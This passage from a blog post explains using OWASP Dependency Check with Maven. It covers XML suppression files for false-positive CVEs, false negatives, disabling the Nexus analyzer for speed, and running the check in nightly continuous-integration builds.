incorrectly reported. Fortunately Dependency Check has a suppression file which is an easy to fill XML document to suppress false positives (the resulting html report has a button to generate xml snippets for easy copy and pasting). Configuring a suppression file is easy:</p><br/><br/><pre class="lang:xml decode:true"><br/><configuration><br/> <suppressionFile>ignore.xml</suppressionFile><br/></configuration><br/></pre><br/><br/><p>And the suppression file itself, with snippets generated by the html report:</p><br/><br/><pre class="lang:xml decode:true"><br/><?xml version="1.0" encoding="UTF-8"?><br/><suppressions xmlns="https://www.owasp.org/index.php/OWASP_Dependency_Check_Suppression"><br/> <suppress><br/> <notes><![CDATA[file name: javax.servlet.jsp.jstl-1.2.1.jar]]></notes><br/> <sha1>7F687140E9D264EE00EAA924714ADF9A82CC18DC</sha1><br/> <cve>CVE-2013-2566</cve><br/> </suppress><br/> <suppress><br/> <notes><![CDATA[file name: javax.servlet.jsp.jstl-1.2.1.jar]]></notes><br/> <sha1>7F687140E9D264EE00EAA924714ADF9A82CC18DC</sha1><br/> <cve>CVE-2011-5035</cve><br/> </suppress><br/></suppressions><br/></pre><br/><br/><p>When the the dependency check is ran now, these two vulnerabilities will no longer be listed for this file.</p><br/><br/><p>My guess is that when Dependency Check will start using the <a href="https://github.com/jeremylong/DependencyCheck/issues/124">dependency information from the maven</a> pom most of these false positives will be history :-)</p><br/><br/><h3>False Negatives</h3><br/><br/><p>Currently Dependency Check is unable to identify all libraries (because of missing metadata and presence in the Sonatype Nexus) - these libraries (easily recognized by the lack of an Identifier in the report) still need manual investigation. Again, the dependency information from the maven pom will reduce these. </p><br/><br/><h3>Performance</h3><br/><br/><p>If you look at the timestamps present in my analysis phase you'll will see that the whole check takes about 3 minutes. This time is mostly spent in talking to the Sonatype Nexus repository, trying to find the version information for the hash of the jar file. This feature can be disabled (you'll loose identification of some jars) by disabling the Nexus analyzer in the configuration file:</p><br/><pre><br/><nexusAnalyzerEnabled>false</nexusAnalyzerEnabled><br/></pre><br/><br/><p>The check now only takes 10 seconds or so. Of course there is no need to check the dependencies for vulnerabilities each time you make a build. A check once a day is more than sufficient. The ideal place to me it seems is the nightly build on the continuous integration server (e.g. Bamboo, Jenkins) - most of the time these builds use a separate profile to which the dependency check plugin can be added without interfering with the developer build. Also perform the check before making a new release of your application.</p><br/><br/><h3>Summary and recommendations</h3><br/><br/><p>OWASP <a href="http://jeremylong.github.io/DependencyCheck/dependency-check-maven/usage.html">Dependency Check</a> is a valuable tool that warns you when you've got outdated libraries with known vulnerabilities as part of your project.</p><br/><br/><p>Currently Dependency Check uses meta data in the library to identify it or looks up the file hash in the Sonatye Nexus. Sometimes this results in a incorrectly identified library with false positives being reported. These are easily suppressed using a suppression file. Also if a library cannot be identified at all, dependency check may not report an vulnerability. However, in an upcoming version support for the dependencies in the Maven pom will be included. My guess is that the amount of false positives and false negatives will be greatly reduced.</p><br/><br/><p>I think Dependency Check is best used as part of the nightly build on the continuous integration server and just before a making a release.</p>Anonymoushttp://www.blogger.com/profile/16306207520582389200noreply@blogger.com26